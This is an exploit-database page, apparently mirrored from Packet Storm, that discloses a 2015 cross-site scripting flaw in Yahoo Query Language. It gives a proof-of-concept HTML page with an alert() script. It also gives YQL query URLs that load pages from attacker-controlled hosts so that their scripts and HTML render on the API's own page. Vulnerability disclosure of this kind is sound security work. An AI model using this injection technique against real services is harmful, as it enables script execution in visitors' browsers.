Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Yahoo Query Language Cross Site Scripting

🗓️ 08 Mar 2015 00:00:00Reported by C4TType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Yahoo Query Language Cross Site Scripting Vulnerability discovered by Peyman D. aka C4T in 2015-03-08. Exploit allows executing script and injecting HTML tags through a malicious source in the API's own page

Code
`/***********************************************************************************  
** Exploit Title: Yahoo Query Language Cross Site Scripting   
Vulnerability  
**  
** Exploit Author: Peyman D. aka C4T  
**  
** Vendor Homepage : http://query.yahooapis.com/  
**  
** Google Dork: none  
**  
** Date: 2015-03-08  
**  
** Tested on: Windows 7 / Mozila Firefox  
**  
************************************************************************************  
** Exploit Code:  
******************  
  
<html xmlns="http://www.w3.org/1999/xhtml">  
<body>  
<span>Discovered by Peyman D.</span>  
<span>aka C4T</span>  
<script>  
alert('Successfully Exploited');  
</script>  
</body>  
</html>  
  
************************************************************************************  
Location & Vulnerable query:  
******************  
  
http://query.yahooapis.com/v1/public/yql?q= select * from html where   
url='[attacker-website.com]/exploit.html' and xpath='html'  
  
*************************************************************************************  
** Proof:  
******************  
  
Executable script tag in API's own page:  
  
Malicious source: http://hatrhyme.com/alert.html  
Exploit query:  
http://query.yahooapis.com/v1/public/yql?q= select * from html where   
url='http://hatrhyme.com/alert.html' and xpath='html'  
  
-------------------------------------------------------  
  
Injecting HTML tags in API's own page:  
  
Malicious source: http://hatrhyme.com/expl.html  
Exploit query:  
http://query.yahooapis.com/v1/public/yql?q= select * from html where   
url='http://hatrhyme.com/expl.html' and xpath='html'  
  
-------------------------------------------------------  
******************************************************************************************  
**  
** Explanation and the cause of this vulnerability:  
**  
** http://hatrhyme.com/XSSInYQL.pdf  
**  
******************************************************************************************  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Mar 2015 00:00Current
yahoo query languagecross site scriptingvulnerabilityexploitpeyman d.apimalicious sourceinjectionhtml tags
20